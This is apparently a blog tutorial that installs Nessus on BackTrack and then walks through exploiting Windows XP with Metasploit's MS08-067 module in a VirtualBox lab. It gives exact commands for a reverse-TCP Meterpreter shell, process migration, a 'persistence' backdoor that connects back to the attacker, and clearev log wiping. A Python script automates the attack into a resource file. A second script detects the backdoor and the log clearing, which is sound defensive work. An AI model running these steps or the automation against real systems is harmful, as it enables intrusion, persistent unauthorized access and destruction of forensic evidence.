
Installing the Nessus software on BackTrack

Mar 19

How to Install Nessus on Backtrack 5 R3


Nessus is a network vulnerability scanner, free for personal (home) use. It detects vulnerabilities on systems and is one of the most widely used vulnerability scanners in computer security. Nessus scans for vulnerabilities, misconfigurations, and default, common or blank passwords on system accounts, among other things. You can use it to scan your own systems and then patch what it finds. To install Nessus on BackTrack 5 R3, the first thing to do is download it from http://www.tenable.com/products/nessus/

Download the Nessus package from http://www.tenable.com/products/nessus/ and install it manually (read my earlier post on how to install a package on BackTrack 5); once it is installed, skip to step two. If you have an internet connection you can instead install Nessus from the repository. Run this command to download and install it:

apt-get install nessus


After installing it, create a Nessus user account with the nessus-adduser command:

/opt/nessus/sbin/nessus-adduser
Now register on the Nessus website at http://www.nessus.org/register/ to get an activation code, which is sent to your email. Once you have the code, run this command, replacing xxxx-xxxx-xxxx-xxxx-xxxx with your code:

/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx


This takes some time because the plugin feed is being downloaded and installed. After the update completes, start the Nessus daemon:

/etc/init.d/nessusd start
Then open your browser and enter this URL:

https://localhost:8834/
Nessus serves its web interface over HTTPS on port 8834. The certificate it ships with is self-signed, so expect a browser warning on the first visit. Now go ahead and use Nessus, at your own risk :-D

Exploit Windows XP SP3 Using Metasploit (msfconsole)

Holla guys, let's do some exploitation. :D

1. Start your XP VM in VirtualBox (if you haven't installed XP in VirtualBox yet, see the tutorial here).

2. Make sure the host (BT 5 R1) and the XP VM can reach each other.

3. Scan the target to see the running services:

# nmap -A 192.168.56.101

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-01-28 05:25 WIT
Nmap scan report for 192.168.56.101
Host is up (0.00043s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:91:01:D1 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows

Host script results:
|_nbstat: NetBIOS name: YUDHI-HOME, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:91:01:d1 (Cadmus Computer Systems)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Name: WORKGROUP\YUDHI-HOME
|_  System time: 2012-01-28 05:25:50 UTC+7

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 192.168.56.101

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.64 seconds

4. Scan for vulnerabilities with Nessus (for how to use Nessus, see the how-to linked from the original post). When the scan finishes, analyze the report. It says our target's SMB service is vulnerable, and the severity is High. Pay attention to this finding, because we use it to search for the right exploit: the plugin name is the hint. The finding is MS08-067, whose CVE identifier is CVE-2008-4250.

5. Search Metasploit for an exploit that attacks that vulnerability. Start the Metasploit console:

# msfconsole

At the msf prompt, search for the exploit:

msf > search platform:windows type:exploit cve:2008-4250 app:server path:exploit/windows/smb

Explanation (type "search -h" for the search syntax):
platform: the target is a Windows system, so we choose windows.
type: we only want exploits, not auxiliary or post modules.
cve: the CVE identifier reported by the Nessus scan (MS08-067 is CVE-2008-4250).
app: a server-side attack, as opposed to a client-side one.
path: restrict the search to SMB exploits.

Hit enter. Notice that the exploit "ms08_067_netapi", located at exploit/windows/smb/ms08_067_netapi, shows up; it carries the same name as the Nessus plugin we found earlier. Any unpatched Windows 2000, XP or Server 2003 host is vulnerable to it (Vista and Server 2008 were also affected, but exploitation there is much less reliable). Let's use it.

6. Type these:

use exploit/windows/smb/ms08_067_netapi
Explanation: this tells Metasploit to use this exploit against the target.

set RHOST 192.168.56.101
Explanation: RHOST is the remote host, the target. Set it to the IP of the system you want to attack.

set PAYLOAD windows/meterpreter/reverse_tcp

Explanation: Meterpreter is the payload we want to use; the reverse_tcp variant connects back from the target to us. I'll explain more about payloads later.

set LHOST 192.168.56.1
Explanation: LHOST is the listener host, that is, us. Set it to our own IP, which the target must be able to reach.

exploit
This launches the attack.

7. If everything was done correctly, a Meterpreter session on the target system opens.

8. From this point the machine is under our control. To stop the user from killing our Meterpreter process, quickly migrate into another running process. To list the processes on the target, type

meterpreter > ps

Look for explorer.exe, the user's desktop shell, which stays alive as long as the user is logged on, and note its PID. Then migrate into it:

meterpreter > migrate [PID]

Keep in mind that explorer.exe runs as the logged-on user, so migrating into it from the SYSTEM-level session this exploit gives you drops to that user's privileges; pick a SYSTEM process instead if you need to keep them. You can now do whatever you want on the system.

9. Next, place a backdoor for later access. Conveniently, Metasploit also provides a script for this, called "persistence". Let's look at its usage:

meterpreter > run persistence -h
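The search, use, set and exploit steps above, written out as a resource file that msfconsole can replay non-interactively. This is an added example, not code from the original post: the nmap text is a constructed sample copied from the scan above, and the CVE-to-module table, the `check` step and the same-/24 sanity check on LHOST are assumptions made for the illustration.

```python
"""Turn an nmap -A scan plus a scanner finding into an msfconsole resource script.

Added example, not code from the original post. It re-checks that 445/tcp is
actually open before writing the use/set/exploit sequence into a resource
file that msfconsole replays with `msfconsole -r ms08_067.rc`.
"""
import ipaddress
import re

# Constructed sample: the port table and OS guess from the nmap output above.
NMAP_SAMPLE = """\
Nmap scan report for 192.168.56.101
Host is up (0.00043s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:91:01:D1 (Cadmus Computer Systems)
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
"""

# Assumed mapping from the scanner's CVE to the Metasploit module and the port
# it targets. MS08-067 is CVE-2008-4250; the module name carries the same
# "ms08_067" hint as the Nessus plugin.
FINDING_TO_MODULE = {
    "CVE-2008-4250": ("exploit/windows/smb/ms08_067_netapi", 445),
}

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap(text):
    """Return (target, {(port, proto): (state, service, version)}, os_details)."""
    target, ports, os_details = None, {}, ""
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"Nmap scan report for (\S+)", line)
        if m:
            target = m.group(1)
            continue
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports[(int(port), proto)] = (state, service, (version or "").strip())
            continue
        if line.startswith("OS details:"):
            os_details = line.split(":", 1)[1].strip()
    return target, ports, os_details


def smb_exposed(ports):
    """True when the SMB port the module needs is reported open."""
    return ports.get((445, "tcp"), ("closed",))[0] == "open"


def build_resource_script(cve, rhost, lhost,
                          payload="windows/meterpreter/reverse_tcp"):
    """Emit the msfconsole commands from the steps above as resource-file text."""
    module, rport = FINDING_TO_MODULE[cve]
    # The reverse payload connects back to LHOST, so LHOST must be reachable
    # from the target. On the host-only VirtualBox network in the post both
    # machines share one /24; that is the assumption checked here.
    if ipaddress.ip_address(rhost) not in ipaddress.ip_network(
            "%s/24" % lhost, strict=False):
        raise ValueError("LHOST %s is not on the same /24 as RHOST %s"
                         % (lhost, rhost))
    return "\n".join([
        "use %s" % module,
        "set RHOST %s" % rhost,
        "set RPORT %d" % rport,
        "set PAYLOAD %s" % payload,
        "set LHOST %s" % lhost,
        "check",    # the module fingerprints the target before we fire
        "exploit",
        "",
    ])


def plan_attack(nmap_text, cve, lhost):
    """Parse the scan, refuse to proceed without SMB, then build the rc text."""
    target, ports, os_details = parse_nmap(nmap_text)
    if target is None or not smb_exposed(ports):
        raise RuntimeError("445/tcp is not open on %s; nothing to exploit" % target)
    if "Windows" not in os_details:
        raise RuntimeError("OS guess %r does not look like Windows" % os_details)
    return build_resource_script(cve, target, lhost)


if __name__ == "__main__":
    rc = plan_attack(NMAP_SAMPLE, "CVE-2008-4250", "192.168.56.1")
    with open("ms08_067.rc", "w") as fh:
        fh.write(rc)
    print(rc)
```

Run it on the BackTrack host and then `msfconsole -r ms08_067.rc`; the `check` line is informational only, msfconsole still runs the `exploit` line that follows it, so read its verdict before the session is expected.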

Let's execute it:

meterpreter > run persistence -A -X -p 10000 -r 192.168.56.1

And that's it: a backdoor has been created on the target system. The backdoor is a .vbs file in the C:\WINDOWS\TEMP directory, and the script also adds an autostart entry under the registry key HKLM\Software\Microsoft\Windows\CurrentVersion\Run\XXXXX (random name), so the backdoor becomes active again whenever the PC starts. The options used: -A starts a matching handler on our side right away, -X makes the agent start at boot, -p is the port and -r the address it connects back to. The script also records the file and registry value it created in a cleanup resource file under ~/.msf4/logs/persistence/ so they can be removed afterwards. (For a tutorial on using the backdoor you can go here.)

10. And don't forget to clear our tracks:

meterpreter > clearev

This clears the Application, System and Security event logs on the target. To exit the shell just type "exit".

The steps of this attack, mapped onto the hacking methodology:
1. Information gathering: use nmap to collect information.
2. Service enumeration: use nmap to see the running services.
3. Vulnerability assessment: use Nessus to scan for the vulnerability and Metasploit to find the exploit.
4. Exploitation: use Metasploit in console mode to take over the system.
5. Backdooring: use the Metasploit 'persistence' script to create a backdoor.
6. Housekeeping: use Metasploit's 'clearev' to clear the tracks.

Hope this helps. :) Let's make history!!
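The two artifacts described above, the Run-key autostart pointing at a script in C:\WINDOWS\TEMP and the cleared event logs, seen from the responder's side. This is an added example, not code from the original post: the Run-key dump and the event records are constructed samples (the value and file names are made up), and the event IDs are the documented Windows ones, 517 for a cleared Security log on XP/2003 and 1102 (plus 104 for the System log) on Vista and later.

```python
"""Hunt for what the persistence script and clearev leave behind.

Added example, not code from the original post. Two checks a responder would
run on the XP box afterwards: Run-key values that launch something out of a
temp directory, and event-log records that say a log was cleared.
"""
import re

# Constructed sample of HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# (value name -> command), as an exported key would show it. Names made up.
RUN_VALUES = {
    "VBoxTray": r'C:\WINDOWS\system32\VBoxTray.exe',
    "ZlGJwkUvq": r'cscript "C:\WINDOWS\TEMP\tYqKwXpe.vbs"',
}

# Constructed sample event records: (log name, event id, message).
EVENTS = [
    ("Security", 528, "Successful Logon: User Name: yudhi"),
    ("Security", 517, "The audit log was cleared"),
    ("System", 6005, "The Event log service was started."),
]

# Directories a boot-time Run entry has no business launching from.
TEMP_DIRS = ("\\windows\\temp\\", "\\local settings\\temp\\", "\\appdata\\local\\temp\\")

# 517: audit log cleared (XP/2003). 1102: Security log cleared, 104: System
# log cleared (Vista and later).
LOG_CLEARED_IDS = {517, 1102, 104}

PATH_RE = re.compile(r'([a-z]:\\[^"]+?\.(?:vbs|js|bat|cmd|exe))', re.I)


def suspicious_run_values(values):
    """Return (value name, path) for Run entries that start something in a temp dir."""
    hits = []
    for name, cmd in values.items():
        for path in PATH_RE.findall(cmd):
            if any(t in path.lower() for t in TEMP_DIRS):
                hits.append((name, path))
    return hits


def log_clear_events(events):
    """Return the records whose ID marks a cleared log."""
    return [e for e in events if e[1] in LOG_CLEARED_IDS]


def triage(values, events):
    """Combine both checks into plain findings a responder can act on."""
    findings = []
    for name, path in suspicious_run_values(values):
        findings.append("Run value %s launches %s from a temp directory" % (name, path))
    for log, eid, msg in log_clear_events(events):
        findings.append("%s log cleared (event %d: %s)" % (log, eid, msg))
    return findings


if __name__ == "__main__":
    for finding in triage(RUN_VALUES, EVENTS):
        print(finding)
```

Note what clearev cannot hide: on XP the Security log records its own clearing as event 517, so the absence of history plus a lone 517 is itself the indicator, and the Run value and the .vbs in C:\WINDOWS\TEMP survive the log wipe entirely.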

Read more: http://scx010c075.blogspot.com/2012/01/exploit-windows-xp-sp3using-metasploit.html
